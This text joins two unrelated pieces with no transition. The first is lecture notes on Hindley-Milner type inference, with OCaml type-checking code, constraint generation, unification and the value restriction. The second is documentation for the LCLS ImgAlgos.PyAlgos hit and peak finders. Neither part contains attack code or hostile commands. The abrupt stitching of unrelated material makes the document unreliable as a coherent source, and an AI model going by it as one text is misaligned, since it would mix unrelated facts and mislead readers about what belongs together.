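The rules can indeed be read off as a recursive function with one case per rule. Here is a sketch; the constructor and function names are mine, not necessarily those of the course's demo code:

```ocaml
(* A sketch of the type checker the rules define. *)
type typ = IntT | BoolT | ArrT of typ * typ
type op = Plus | Minus | LessThan
type exp =
    IntE of int
  | BoolE of bool
  | Op of exp * op * exp
  | Var of string
  | If of exp * exp * exp
  | Fun of string * typ * exp
  | Call of exp * exp
  | Let of string * exp * exp

exception Type_error of string

(* optype from the operator rule *)
let optype (o : op) : typ * typ * typ =
  match o with
  | Plus | Minus -> (IntT, IntT, IntT)
  | LessThan -> (IntT, IntT, BoolT)

(* G |- e : t -- view g and e as inputs, compute t *)
let rec typecheck (g : (string * typ) list) (e : exp) : typ =
  match e with
  | IntE _ -> IntT
  | BoolE _ -> BoolT
  | Var x ->
      (match List.assoc_opt x g with
       | Some t -> t
       | None -> raise (Type_error ("unbound variable " ^ x)))
  | Op (e1, o, e2) ->
      let (t1, t2, t3) = optype o in
      if typecheck g e1 = t1 && typecheck g e2 = t2 then t3
      else raise (Type_error "operator applied to wrong types")
  | If (e1, e2, e3) ->
      if typecheck g e1 <> BoolT then raise (Type_error "guard not bool");
      let t = typecheck g e2 in
      if typecheck g e3 = t then t else raise (Type_error "branches differ")
  | Fun (x, t, body) -> ArrT (t, typecheck ((x, t) :: g) body)
  | Call (e1, e2) ->
      (match typecheck g e1 with
       | ArrT (t1, t2) when typecheck g e2 = t1 -> t2
       | _ -> raise (Type_error "bad application"))
  | Let (x, e1, e2) -> typecheck ((x, typecheck g e1) :: g) e2
```

Note how the Fun case uses the required annotation: without it, there would be no type to extend the context with.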
TYPE INFERENCE
For three distinct and complete achievements:
1. LCF, the mechanization of Scott's Logic of Computable Functions, probably the first theoretically based yet practical tool for machine assisted proof construction;
2. ML, the first language to include polymorphic type inference together with a type-safe exception-handling mechanism;
3. CCS, a general theory of concurrency.
In addition, he formulated and strongly advanced full abstraction, the study of the relationship between operational and denotational semantics.
Robin Milner
We will be studying Hindley-Milner type inference. Discovered by Hindley, rediscovered by Milner. Formalized by Damas. Broken several times when effects were added to ML.
The ML language and type system is designed to support a very strong form of type inference.

```ocaml
let rec map f l =
  match l with
    [] -> []
  | hd::tl -> f hd :: map f tl
```

It’s very convenient that we don’t have to annotate f and l with their types, as is required by our type checking algorithm.

ML finds this type for map:
```
map : ('a -> 'b) -> 'a list -> 'b list
```
which is really an abbreviation for this type:
```
map : forall 'a,'b.('a -> 'b) -> 'a list -> 'b list
```
We call this type the *principal type (scheme)* for `map`.

Any other ML-style type you can give `map` is *an instance* of this type, meaning we can obtain the other types via *substitution* of types for parameters from the principal type.

**Eg:**
- `(bool -> int) -> bool list -> int list`
- `('a -> int) -> 'a list -> int list`
- `('a -> 'a) -> 'a list -> 'a list`

Principal types are great:
- the type inference engine can make a *best choice* for the type to give an expression
- the engine doesn't have to guess (and won't have to guess wrong)

The fact that principal types exist is surprisingly brittle. If you change ML's type system a little bit in either direction, it can fall apart.
Suppose we take out polymorphic types and need a type for id:
```ocaml
let id x = x
```
Then the compiler might guess that id has one (and only one) of these types:
```ocaml
id : bool -> bool
id : int -> int
```
But later on, one of the following code snippets won't type check:
```
id true
id 3
```
So whatever choice is made, a different one might have been better.
We showed that removing types from the language causes a failure of principle types.
Does adding more types always make type inference easier?
Nope!
OCaml has universal types on the outside ("prenex quantification"):
forall 'a,'b. (('a -> 'b) -> 'a list -> 'b list)
It does not have types like this:
((forall 'a.'a -> int) -> int -> bool)
argument type has its own polymorphic quantifier
Consider this program:

```ocaml
let f g = (g true, g 3)
```

Notice that parameter g is used inside f as if:
1. its argument can have type bool, AND
2. its argument can have type int

Does the following type work?

```ocaml
('a -> int) -> int * int
```

**NO:** this says g's argument can be *any* type 'a (so 'a could be int or bool). Consider g = (fun x -> x + 2) : int -> int. Then f g goes wrong when g is applied to true inside f.
Consider this program again:
```ocaml
let f g = (g true, g 3)
```
We might want to give it this type:
```ocaml
f : (forall a.a->a) -> bool * int
```
Notice that the universal quantifier appears left of ->
System F is a lot like OCaml, except that it allows universal quantifiers in any position. It could type check f.
```
let f g = (g true, g 3)
```
```
f : (forall a.a->a) -> bool * int
```
Unfortunately, type inference in System F is undecidable.
Developed in 1972 by logician Jean-Yves Girard, who was interested in the consistency of a logic of 2nd-order arithmetic.
Rediscovered as programming language by John Reynolds in 1974.
Language Design for Type Inference

Even seemingly small changes can affect type inference.

Suppose "+" operated on both floats and ints. What type for this?

```ocaml
let f x = x + x
```

f : int -> int ?
f : float -> float ?
f : 'a -> 'a ?

No type in OCaml's type system works. In Haskell:
```
f : Num 'a => 'a -> 'a
```
INFERRING SIMPLE TYPES
A type scheme contains type variables that may be filled in during type inference
\[ s ::= a \mid \text{int} \mid \text{bool} \mid s \to s \]
A term scheme is a term that contains type schemes rather than proper types. eg, for functions:
\[
\text{fun (x:s) -> e}
\]
\[
\text{let rec f (x:s) : s = e}
\]
Two Algorithms for Inferring Types
Algorithm 1:
• Declarative; generates constraints to be solved later
• Easier to understand
• Easier to prove correct
• Less efficient, not used in practice
Algorithm 2:
• Imperative; solves constraints and updates as-you-go
• Harder to understand
• Harder to prove correct
• More efficient, used in practice
• See: http://okmij.org/ftp/ML/generalization.html
Algorithm 1

1) Add distinct variables in all places type schemes are needed

2) Generate constraints (equations between types) that must be satisfied in order for an expression to type check
   - Notice the difference between this and the type checking algorithm from last time. Last time, we tried to:
     - eagerly deduce the concrete type when checking every expression
     - reject programs when types didn't match. eg:
       - f e  -- f's argument type must equal e's type
   - This time, we'll collect up equations like:
     - a -> b = c

3) Solve the equations, generating substitutions of types for variables
Example: Inferring types for map
```ocaml
let rec map f l =
match l with
| [] -> []
| hd::tl -> f hd :: map f tl
```
Step 1: Annotate with distinct type variables

let rec map (f:a) (l:b) : c =
  match l with
    [] -> []
  | hd::tl -> f hd :: map f tl
Step 2: Generate Constraints
```
let rec map (f:a) (l:b) : c =
match l with
| [] -> []
| hd::tl -> f hd :: map f tl
```
final constraints:
- \( b = b' \) list
- \( b = b'' \) list
- \( b = b''' \) list
- \( a = a \)
- \( b = b''' \) list
- \( a = b'' \rightarrow a' \)
- \( c = c' \) list
- \( a' = c' \)
- \( d \) list = \( c' \) list
- \( d \) list = \( c \)
Step 3: Solve Constraints

**final solution:**
\[
[b' \rightarrow c'/a] \qquad [b' \text{ list}/b] \qquad [c' \text{ list}/c]
\]
Applying the solution to the annotated program:
let rec map (f:b' -> c') (l:b' list) : c' list =
match l with
[] -> []
| hd::tl -> f hd :: map f tl
Finally, renaming type variables:
```ml
let rec map (f:a -> b) (l:a list) : b list =
match l with
| [] -> []
| hd::tl -> f hd :: map f tl
```
Type Inference Details
Type constraints are sets of equations between type schemes
- q ::= \{s_{11} = s_{12}, \ldots, s_{n1} = s_{n2}\}
- eg: \{b = b’ list, a = b \rightarrow c\}
Syntax-directed constraint generation
- our algorithm crawls over the abstract syntax of untyped expressions and generates
  - a term scheme
  - a set of constraints

Algorithm defined as a set of inference rules:

\[ G \vdash u \Rightarrow e : t, q \]

where \( G \) is the context, \( u \) the unannotated expression, \( e \) the annotated expression, \( t \) the type (scheme), and \( q \) the constraints that must be solved.

in OCaml:
\[
\text{gen : ctxt} \rightarrow \text{exp} \rightarrow \text{ann\_exp} \ast \text{scheme} \ast \text{constraints}
\]
Constraint Generation
Simple rules:
- $G \vdash x \Rightarrow x : s, \{\} \quad (\text{if } G(x) = s)$
- $G \vdash 3 \Rightarrow 3 : \text{int}, \{\} \quad (\text{same for other ints})$
- $G \vdash \text{true} \Rightarrow \text{true} : \text{bool}, \{\}$
- $G \vdash \text{false} \Rightarrow \text{false} : \text{bool}, \{\}$
If statements
G |-- u1 ==> e1 : t1, q1
G |-- u2 ==> e2 : t2, q2
G |-- u3 ==> e3 : t3, q3          (for a fresh a)
---------------------------------------------
G |-- if u1 then u2 else u3 ==> if e1 then e2 else e3
        : a, q1 U q2 U q3 U {t1 = bool, a = t2, a = t3}
Function Application

G |-- u1 ==> e1 : t1, q1
G |-- u2 ==> e2 : t2, q2          (for a fresh a)
---------------------------------------------
G |-- u1 u2 ==> e1 e2 : a, q1 U q2 U {t1 = t2 -> a}
Function Declaration
\[
\frac{G, x{:}a \vdash u \Rightarrow e : t, q \quad (\text{for fresh } a, b)}{G \vdash \text{fun } x \rightarrow u \;\Rightarrow\; \text{fun } (x{:}a) \rightarrow e : a \rightarrow b, \; q \cup \{t = b\}}
\]
G, f : a -> b, x : a |-- u ==> e : t, q (for fresh a,b)
---------------------------------------------
G |-- rec f(x) = u ==> rec f (x : a) : b = e : a -> b, q U {t = b}
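These rules can be sketched in OCaml for a small fragment (constants, variables, application); the datatype names and the counter-based `fresh` are my own assumptions, not the course's `gen`:

```ocaml
(* A sketch of constraint generation for a fragment of the language. *)
type scheme = SVar of string | SInt | SBool | SArr of scheme * scheme
type exp = IntE of int | Var of string | Call of exp * exp

(* Fresh type variables from a counter. *)
let counter = ref 0
let fresh () = incr counter; SVar ("a" ^ string_of_int !counter)

(* gen : ctxt -> exp -> scheme * constraints *)
let rec gen (g : (string * scheme) list) (u : exp)
  : scheme * (scheme * scheme) list =
  match u with
  | IntE _ -> (SInt, [])
  | Var x -> (List.assoc x g, [])
  | Call (u1, u2) ->
      let (t1, q1) = gen g u1 in
      let (t2, q2) = gen g u2 in
      let a = fresh () in
      (* the application rule: q1 U q2 U {t1 = t2 -> a} for a fresh a *)
      (a, (t1, SArr (t2, a)) :: q1 @ q2)
```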
Solving Constraints

A solution to a system of type constraints is a substitution $S$
- a function from type variables to types
- assume substitutions are defined on all type variables:
  - $S(a) = a$ (for almost all variables $a$)
  - $S(a) = s$ (for some type scheme $s$)
- $\text{dom}(S)$ = set of variables s.t. $S(a) \neq a$
We can also apply a substitution $S$ to a full type scheme $s$.
apply: $[ \text{int}/a, \text{int}\rightarrow\text{bool}/b ]$
to: $b \rightarrow a \rightarrow b$
returns: $(\text{int}\rightarrow\text{bool}) \rightarrow \text{int} \rightarrow (\text{int}\rightarrow\text{bool})$
Substitutions

When is a substitution $S$ a solution to a set of constraints?

Constraints: \{ $s_1 = s_2$, $s_3 = s_4$, $s_5 = s_6$, ... \}

When the substitution makes both sides of all equations the same.

Eg:

constraints:
\begin{align*}
a &= b \rightarrow c \\
c &= \text{int} \rightarrow \text{bool}
\end{align*}

solution:
\begin{align*}
&b \rightarrow (\text{int} \rightarrow \text{bool})/a \\
&\text{int} \rightarrow \text{bool}/c \\
&b/b
\end{align*}

constraints with solution applied:
\begin{align*}
b \rightarrow (\text{int} \rightarrow \text{bool}) &= b \rightarrow (\text{int} \rightarrow \text{bool}) \\
\text{int} \rightarrow \text{bool} &= \text{int} \rightarrow \text{bool}
\end{align*}
A second solution
constraints:
\[
\begin{align*}
a & = b \rightarrow c \\
c & = \text{int} \rightarrow \text{bool}
\end{align*}
\]
solution 1:
\[
\begin{align*}
b & \rightarrow (\text{int} \rightarrow \text{bool})/a \\
\text{int} & \rightarrow \text{bool}/c \\
b & /b
\end{align*}
\]
solution 2:
\[
\begin{align*}
\text{int} & \rightarrow (\text{int} \rightarrow \text{bool})/a \\
\text{int} & \rightarrow \text{bool}/c \\
\text{int} & /b
\end{align*}
\]
When is one solution better than another to a set of constraints?
constraints:
\[
\begin{align*}
a &= b \rightarrow c \\
c &= \text{int} \rightarrow \text{bool}
\end{align*}
\]
solution 1:
\[
\begin{align*}
b &\rightarrow (\text{int} \rightarrow \text{bool})/a \\
\text{int} &\rightarrow \text{bool}/c \\
b/b
\end{align*}
\]
type b \rightarrow c with solution applied:
\[
b \rightarrow (\text{int} \rightarrow \text{bool})
\]
solution 2:
\[
\begin{align*}
\text{int} &\rightarrow (\text{int} \rightarrow \text{bool})/a \\
\text{int} &\rightarrow \text{bool}/c \\
\text{int}/b
\end{align*}
\]
type b \rightarrow c with solution applied:
\[
\text{int} \rightarrow (\text{int} \rightarrow \text{bool})
\]
Solution 1 is "more general" – there is more flex.
Solution 2 is "more concrete".
We prefer the more general (less concrete) solution 1.
Technically, we prefer T to S if there exists another substitution U such that for all types t, $S(t) = U(T(t))$.

There is always a *best* solution, which we call a *principal solution*. The best solution is (at least as) preferred as any other solution.
Examples

Example 1
- $q = \{a=\text{int}, \ b=a\}$
- principal solution $S$:
  - $S(a) = S(b) = \text{int}$
  - $S(c) = c$ (for all $c$ other than $a, b$)
Example 2
- $q = \{a=\text{int}, \ b=a, \ b=\text{bool}\}$
- principal solution $S$:
  - does not exist (there is no solution to $q$)
Unification: an algorithm that produces the principal solution to a set of constraints (if one exists)
- Unification systematically simplifies a set of constraints, yielding a substitution
- Starting state of the unification process: (I, q), where I is the identity substitution
- Final state of the unification process: (S, { })
Unification

Unification simplifies equations step-by-step until
- there are no equations left to simplify, or
- we find basic equations are inconsistent and we fail

```
type ustate = substitution * constraints

unify_step : ustate -> ustate

unify_step (S, {bool=bool} U q) = (S, q)
unify_step (S, {int=int} U q)   = (S, q)
unify_step (S, {a=a} U q)       = (S, q)
```
\[
\text{unify\_step} \ (S, \ \{A \rightarrow B = C \rightarrow D\} \ U \ q) \ = \ (S, \ \{A = C, \ B = D\} \ U \ q)
\]
\[
\text{unify\_step} \ (S, \ \{a=s\} \ U \ q) \ = \ ([s/a] \circ S, \ [s/a]q)
\]

*when \( a \) is not in \( \text{FreeVars}(s) \)*

Here \( [s/a] \circ S \) is the substitution that does \( S \) and then substitutes \( s \) for \( a \), and \( [s/a]q \) is the constraint set \( q \) with \( s \) replacing \( a \).
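The step rules can be bundled into a worklist loop. The following is a hypothetical Python sketch (same illustrative encoding as before: `'int'`, `'bool'`, `('var', name)`, `('arrow', t1, t2)`): it discharges trivial equations, decomposes arrows, eliminates variables with the occurs check, and fails on inconsistent basic equations.

```python
def free_vars(t):
    if isinstance(t, tuple) and t[0] == 'var':
        return {t[1]}
    if isinstance(t, tuple) and t[0] == 'arrow':
        return free_vars(t[1]) | free_vars(t[2])
    return set()

def subst(a, s, t):
    """Replace variable a by type s inside type t."""
    if isinstance(t, tuple) and t[0] == 'var':
        return s if t[1] == a else t
    if isinstance(t, tuple) and t[0] == 'arrow':
        return ('arrow', subst(a, s, t[1]), subst(a, s, t[2]))
    return t

def unify(q):
    """Return a principal solution (a dict) for constraints q, or raise."""
    S = {}
    q = list(q)
    while q:
        l, r = q.pop()
        if l == r:
            continue                                  # bool=bool, int=int, a=a
        if isinstance(l, tuple) and l[0] == 'arrow' and \
           isinstance(r, tuple) and r[0] == 'arrow':  # A->B = C->D
            q += [(l[1], r[1]), (l[2], r[2])]
        elif isinstance(l, tuple) and l[0] == 'var':
            a, s = l[1], r
            if a in free_vars(s):
                raise TypeError('occurs check: no solution')
            S = {b: subst(a, s, t) for b, t in S.items()}
            S[a] = s                                  # [s/a] o S
            q = [(subst(a, s, x), subst(a, s, y)) for x, y in q]
        elif isinstance(r, tuple) and r[0] == 'var':
            q.append((r, l))                          # symmetric case
        else:
            raise TypeError('inconsistent equation: no solution')
    return S
```

On the running example { a = b -> c, c = int -> bool } it returns the principal solution mapping a to b -> (int -> bool), and on { a = a -> a } it fails with the occurs check.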
Recall this program:

```
fun x -> x x
```

It generates the constraint: \( a \rightarrow a = a \)

What is the solution to \( \{a = a \rightarrow a\} \)?

There is none!

Notice that \( a \) does appear in \( \text{FreeVars}(s) \). Whenever \( a \) appears in \( \text{FreeVars}(s) \) and \( s \) is not just \( a \), there is no solution to the system of constraints.

"when a is not in FreeVars(s)" is known as the "occurs check"
Irreducible States

Recall: unification simplifies equations step-by-step until
- there are no equations left to simplify:
  \[(S, \{ \})\]
  no constraints left. \(S\) is the final solution!
- or we find basic equations are inconsistent:
  - \(\text{int} = \text{bool}\)
  - \(s_1 \rightarrow s_2 = \text{int}\)
  - \(s_1 \rightarrow s_2 = \text{bool}\)
  - \(a = s\) (where \(s\) contains \(a\))
  (or is symmetric to one of the above)

In the latter case, the program does not type check.
TYPE INFERENCE
MORE DETAILS
Generalization
Where do we introduce polymorphic values? Consider:
```plaintext
g (fun x -> 3)
```
It is tempting to do something like this:
```plaintext
(fun x -> 3) : forall a. a -> int
```
```plaintext
g : (forall a. a -> int) -> int
```
But recall the beginning of the lecture:
if we aren’t careful, we run into decidability issues
Where do we introduce polymorphic values?

In ML languages: only for values bound in "let declarations"

\[
g \ (\text{fun } x \rightarrow 3)
\]

No polymorphism for \( \text{fun } x \rightarrow 3 \)!

\[
\text{let } f : \forall a. \ a \rightarrow \text{int} = \text{fun } x \rightarrow 3 \text{ in } g \ f
\]

Yes polymorphism for \( f \)!
Let Polymorphism

Where do we introduce polymorphic values?

```
let x = v
```

**Rule:**
- if \( v \) is a value (or guaranteed to evaluate to a value without effects)
  - OCaml has some rules for this
- and \( v \) has type scheme \( s \)
- and \( s \) has free variables \( a, b, c, ... \)
- and \( a, b, c, ... \) do not appear in the types of other values in the context
- then \( x \) can have type \( \forall a, b, c. s \)

That's a hell of a lot more complicated than you thought, eh?
Unsound Generalization Example
Consider this function f – a fancy identity function:
\[
\text{let } f = \text{fun } x \rightarrow \text{let } y = x \text{ in } y
\]
A sensible type for f would be:
\[
f : \text{forall } a. \ a \rightarrow a
\]
A bad (unsound) type for f would be:

\[
f : \text{forall } a, b. \ a \rightarrow b
\]

With that type,

```
(f true) + 7
```

goes wrong! But if f can have the bad type, it all type checks. This *counterexample* to soundness shows that f can't possibly be given the bad type safely.
Now, consider doing type inference:

```
let f = fun x -> let y = x in y
```

We start with \( x : a \).

Suppose we generalize and allow \( y : \text{forall } a.a \). Then we can use \( y \) as if it has any type, such as \( y : b \).

But now we have inferred that (\( \text{fun } x \rightarrow ... \)) : \( a \rightarrow b \), and if we generalize again, \( f : \text{forall } a,b. \ a \rightarrow b \).

That's the bad type!

The bad step was generalizing \( y \) – \( y \) can't really have any type at all. Its type has got to be the same as whatever the argument \( x \) is.

\( x \) was in the context when we tried to generalize \( y \)!
The Value Restriction

```
let x = v
```

The right-hand side has got to be a value to enable polymorphic generalization.
Unsound Generalization Again

```ocaml
let x = ref [] in   (* ref [] is not a value! *)
x := [true];
List.hd (!x) + 3
```

- `x : forall a . a list ref`
- use x at type bool as if `x : bool list ref`
- use x at type int as if `x : int list ref`

and we crash ....
What does OCaml do?

```ocaml
let x = ref [] in   (* x : '_weak1 list ref *)
x := [true];        (* now x : bool list ref *)
List.hd (!x) + 3
```

- a "weak" type variable can't be generalized
- it means "I don't know what type this is, but it can only be one particular type"
- look for the "_" beginning a type variable name

After the assignment, the "weak" type variable is fixed as bool and can't be anything else: bool was substituted for '_weak1 during type inference. The last line is then a type error:

```
Error: This expression has type bool but an expression was expected of type int
```
One other example

Notice that the RHS is now a value – it happens to be a function value, but any sort of value will do – so generalization is allowed.

```ocaml
let x = fun () -> ref [] in
x () := [true];
List.hd (!x ()) + 3
```

- `x : forall 'a. unit -> 'a list ref`
- `x () : bool list ref`
- `x () : int list ref`

What is the result of this program?

List.hd raises an exception because it is applied to the empty list. Why? Each application `x ()` allocates a fresh reference, so the list read on the last line is a brand new empty list – the earlier assignment went to a different reference.
TYPE INFERENCE:
THINGS TO REMEMBER
**Declarative algorithm:** Given a context G and an untyped term u:
- Find e, t, q such that G |- u => e : t, q
  - understand the constraints that need to be generated
- Find a substitution S that acts as a solution to q via unification
  - if no solution exists, there is no reconstruction
- Apply S to e, i.e. our solution is S(e)
  - S(e) contains schematic type variables a, b, c, etc. that may be instantiated with any type
  - Since S is principal, S(e) characterizes all reconstructions
- If desired, use the type checking algorithm to validate
In order to introduce polymorphic quantifiers, remember:
– Quantifiers must be on the outside only
• this is called “prenex” quantification
• otherwise, type inference may become undecidable
– Quantifiers can only be introduced at let bindings:
• let x = v
• only the type variables that do not appear in the environment may be generalized
– The expression on the right-hand side must be a value
• no references or exceptions
Hit and Peak Finding Algorithms
This note is about n-d array processing algorithms implemented in `ImgAlgos.PyAlgos`. The algorithms can be called from Python, but the low-level implementation is done in C++ with a `boost/python` wrapper. All examples are shown for the Python-level interface.
Content
- Content
- Common features of algorithms
- n-d arrays
- Windows
- Mask
- Make object and set parameters
- Define ROI using windows and/or mask
- Hit finders
- Number of pixels above threshold
- `number_of_pix_above_thr`
- Total intensity above threshold
- `intensity_of_pix_above_thr`
- Peak finders
- Peak selection parameters
- Two threshold "Droplet finder"
- `peak_finder_v1`
- `peak_finder_v4`
- Flood filling algorithm
- `peak_finder_v2`
- Local maxima search algorithm
- `peak_finder_v3`
- Demonstration for local maximum map
- Evaluation of the background level, rms, and S/N ratio
- Matrices of pixels for r0=3 and 4 and different dr values
- Matrices of pixels for r0=5 and 6 and different dr values
- Matrix of pixels for r0=7
- Test of peak finders
- Photon counting
- References
Common features of algorithms
n-d arrays
LCLS detector data come from the DAQ as n-d arrays (`ndarray` in C++ or `numpy.array` in Python). In the simple case, camera data is an image represented by a 2-d array. For composite detectors like CSPAD, CSPAD2X2, EPIX, PNCCD, etc., data comes from a set of sensors as 3-d or 4-d arrays. If the relative sensor positions are known, the sensors can be composed into a 2-d image. But this image contains a significant portion of "fake" empty pixels, which may be up to ~20-25% in the case of CSPAD. The most efficient data processing algorithms should therefore be able to work with n-d arrays directly.
Windows
In some experiments not all sensors contain useful data. It may be more efficient to select a Region Of Interest (ROI) on the sensors where data needs to be processed. To support this feature, a tuple (or list) of windows is passed as a constructor parameter. Each window is represented by a tuple of 5 parameters `(segnum, rowmin, rowmax, colmin, colmax)`, where `segnum` is a sensor index in the n-d array and the other parameters constrain the window's rows and columns in the 2-d sensor matrix. Several windows can be defined for the same sensor using the same `segnum`. For 2-d arrays the `segnum` parameter is not used, but it still needs to be present in the window tuple as any integer number. To increase efficiency, only pixels inside the windows are processed. If `windows=None`, all sensors will be processed.
The array of windows can be converted in 3-d or 2-d array of mask using method `pyimgalgos.GlobalUtils.mask_from_windows`.
Mask
Alternatively, the ROI can be defined by a mask of good/bad (1/0) pixels. For a 2-d image the mask can easily be defined in the user's code. In the case of 3-d arrays, the Mask Editor helps to produce the ROI mask. The entire procedure includes
- conversion of the n-d array to a 2-d image using geometry,
- production of the ROI 2-d mask with the Mask Editor,
- conversion of the 2-d mask to the mask n-d array using geometry.

All steps of this procedure can be completed in the Calibration Management Tool under the tab ROI.
In addition, the mask accounts for bad pixels which should be discarded in processing. The total mask may be a product of the ROI mask and other masks representing good/bad pixels.
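The "product of masks" idea can be sketched with NumPy (the shapes and values here are made up for illustration):

```python
import numpy as np

# ROI mask and a bad-pixel (status) mask for a tiny 2x3 "sensor";
# 1 = good pixel, 0 = discarded pixel.
roi_mask    = np.array([[1, 1, 0], [1, 1, 0]], dtype=np.uint8)
status_mask = np.array([[1, 0, 1], [1, 1, 1]], dtype=np.uint8)

# A pixel is used only if it is good in every contributing mask.
total_mask = roi_mask * status_mask
```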
**Make object and set parameters**
Any algorithm object can be created as shown below.
```python
import numpy as np
from ImgAlgos.PyAlgos import PyAlgos
# create object:
alg = PyAlgos(windows=winds, mask=mask, pbits=0)
```
**Define ROI using windows and/or mask**
Region Of Interest (ROI) is defined by the set of rectangular windows on segments and mask, as shown in example below.
```python
# List of windows
winds = None # entire size of all segments will be used for peak finding
winds = (( 0, 0, 185, 0, 388),
( 1, 20,160, 30,300),
( 7, 0, 185, 0, 388))
# Mask
mask = None                    # (default) all pixels in windows will be used for peak finding
mask = det.mask()              # see class Detector.PyDetector
mask = np.loadtxt(fname_mask)
# mask.shape should be the same as the shape of the data n-d array
```
**Hit finders**
Hit finders return simple values for deciding on event selection. Two algorithms are implemented in `ImgAlgos.PyAlgos`. They count the number of pixels and the intensity above threshold in the Region Of Interest (ROI) defined by the `windows` and `mask` parameters in the object constructor.

Both hit finders receive an input n-d array `data` and a threshold `thr` parameter, and return a single value in accordance with the method name.
**Number of pixels above threshold**
`number_of_pix_above_thr`
```python
npix = alg.number_of_pix_above_thr(data, thr=10)
```
**Total intensity above threshold**
`intensity_of_pix_above_thr`
```python
intensity = alg.intensity_of_pix_above_thr(data, thr=12)
```
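For intuition, the two hit finders compute quantities equivalent to the following NumPy expressions (a sketch only; the real methods additionally honor the windows/mask ROI configured in the constructor):

```python
import numpy as np

data = np.array([[5.0, 20.0, 3.0],
                 [15.0, 1.0, 30.0]])
thr = 10

npix = int((data > thr).sum())             # cf. number_of_pix_above_thr
intensity = float(data[data > thr].sum())  # cf. intensity_of_pix_above_thr
```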
Peak finders
The peak finders work on a calibrated, background-subtracted n-d array of data, in the region of interest specified by the list of windows, using only good pixels from the mask n-d array. All algorithms implemented here have three major stages:

1. find a list of seed peak candidates
2. process the peak candidates and evaluate their parameters
3. apply selection criteria to the peak candidates and return the list of peaks with their parameters
The list of peaks contains 17 (float for uniformity) parameters per peak:
- seg - segment index beginning from 0, example for CSPAD this index should be in the range (0,32)
- row - index of row beginning from 0
- col - index of column beginning from 0
- npix - number of pixels accounted in the peak
- amp_max - pixel with maximal intensity
- amp_total - total intensity of all pixels accounted in the peak
- row_cgrav - row coordinate of the peak evaluated as a "center of gravity" over pixels accounted in the peak using their intensities as weights
- col_cgrav - column coordinate of the peak evaluated as a "center of gravity" over pixels accounted in the peak using their intensities as weights
- row_sigma - row sigma evaluated in the "center of gravity" algorithm
- col_sigma - column sigma evaluated in the "center of gravity" algorithm
- row_min - minimal row of the pixel group accounted in the peak
- row_max - maximal row of the pixel group accounted in the peak
- col_min - minimal column of the pixel group accounted in the peak
- col_max - maximal column of the pixel group accounted in the peak
- bkgd - background level estimated as explained in section below
- noise - r.m.s. of the background estimated as explained in section below
- son - signal over noise ratio estimated as explained in section below
There are a couple of classes that help save/retrieve peak parameter records to/from a text file:
- `pyimgalgos.PeakStore`
- `pyimgalgos.TDFileContainer`
Peak selection parameters
Internal peak selection is done at the end of each peak finder, but all peak selection parameters need to be defined right after the algorithm object is created. These peak selection parameters are set for all peak finders:
```python
# create object:
alg = PyAlgos(windows=winds, mask=mask)
# set peak-selector parameters:
alg.set_peak_selection_pars(npix_min=5, npix_max=5000, amax_thr=0, atot_thr=0, son_min=10)
```
- npix_min: minimum number of pixels that pass the "low threshold" cut
- npix_max: maximum number of pixels that pass the "low threshold" cut
- amax_thr: pixel value must be greater than this high threshold to start a peak
- atot_thr: to be considered a peak the sum of all pixels in a peak must be greater than this value
- son_min: required signal-over-noise ratio (the noise region is typically evaluated with the radius/dr parameters); set this to zero to disable the signal-over-noise cut
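The selection amounts to a simple cut on per-peak records. A sketch, with the record simplified to a dict and the inclusivity of each cut an assumption:

```python
def select_peaks(peaks, npix_min=5, npix_max=5000, amax_thr=0, atot_thr=0, son_min=10):
    """Keep peaks passing all cuts; each peak is a dict with npix, amp_max, amp_total, son."""
    return [p for p in peaks
            if npix_min <= p["npix"] <= npix_max
            and p["amp_max"] > amax_thr
            and p["amp_total"] > atot_thr
            and (son_min == 0 or p["son"] >= son_min)]  # son_min=0 disables the S/N cut

peaks = [
    {"npix": 12, "amp_max": 300, "amp_total": 2500, "son": 15},  # passes all cuts
    {"npix": 3,  "amp_max": 900, "amp_total": 1200, "son": 20},  # too few pixels
]
```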
All peak finders have a few algorithm-dependent parameters:
- nda - calibrated n-d array of data; pedestals and background should be subtracted and common mode corrected
Two threshold "Droplet finder"
Two-threshold peak-finding algorithm in a restricted region around the pixel with maximal intensity. Using two thresholds speeds up the algorithm: it is assumed that only pixels with intensity above \( \text{thr}_\text{high} \) can be peak candidate centers. A candidate is considered a peak if its intensity is maximal in the (square) region of \( \text{radius} \) around it. The low threshold is used in the same region to account for pixels contributing to the peak.
peak_finder_v1
```python
peaks = alg.peak_finder_v1(nda, thr_low=10, thr_high=150, radius=5, dr=0.05)
```
Parameter \( \text{radius} \) in this algorithm is used for two purposes:
- it defines the (square) region to search for a local maximum with intensity above \( \text{thr}_\text{high} \) and contributing pixels with intensity above \( \text{thr}_\text{low} \),
- it is used as the \( \text{r}_0 \) parameter to evaluate background and noise rms as explained in the section below.
peak_finder_v4
```python
peaks = alg.peak_finder_v4(nda, thr_low=10, thr_high=150, rank=4, r0=5, dr=0.05)
```
The same algorithm as peak_finder_v1, but the parameter \( \text{radius} \) is split into two: (unsigned) \( \text{rank} \) and (float) \( \text{r}_0 \), with the same meaning as in peak_finder_v3.
Flood filling algorithm
Define peaks for regions of connected pixels above threshold
peak_finder_v2
```python
peaks = alg.peak_finder_v2(nda, thr=10, r0=5, dr=0.05)
```
Two neighboring pixels are considered connected if they share a common side. Only pixels with intensity above the threshold \( \text{thr} \) are considered.
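Stage 1 of this finder is a connected-components search. A minimal 4-connected flood-fill sketch in plain Python (parameter evaluation and the selection cuts are omitted):

```python
def connected_regions(data, thr):
    """Group 4-connected pixels above thr; returns a list of pixel-coordinate lists."""
    rows, cols = len(data), len(data[0])
    seen = set()
    regions = []
    for r in range(rows):
        for c in range(cols):
            if (r, c) in seen or data[r][c] <= thr:
                continue
            # start a new region and flood-fill from this seed pixel
            stack, region = [(r, c)], []
            seen.add((r, c))
            while stack:
                y, x = stack.pop()
                region.append((y, x))
                for dy, dx in ((1, 0), (-1, 0), (0, 1), (0, -1)):  # common-side neighbors
                    ny, nx = y + dy, x + dx
                    if (0 <= ny < rows and 0 <= nx < cols
                            and (ny, nx) not in seen and data[ny][nx] > thr):
                        seen.add((ny, nx))
                        stack.append((ny, nx))
            regions.append(region)
    return regions

img = [[0, 12, 12, 0],
       [0, 12,  0, 0],
       [0,  0,  0, 15]]
```

On this toy image with thr=10 the fill finds two regions, one of three connected pixels and one isolated pixel.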
Local maximums search algorithm
Defines peaks at local maxima of specified rank (radius); for example, rank=2 means a 5x5 pixel region around the central pixel.
peak_finder_v3
```python
peaks = alg.peak_finder_v3(nda, rank=2, r0=5, dr=0.05)
```
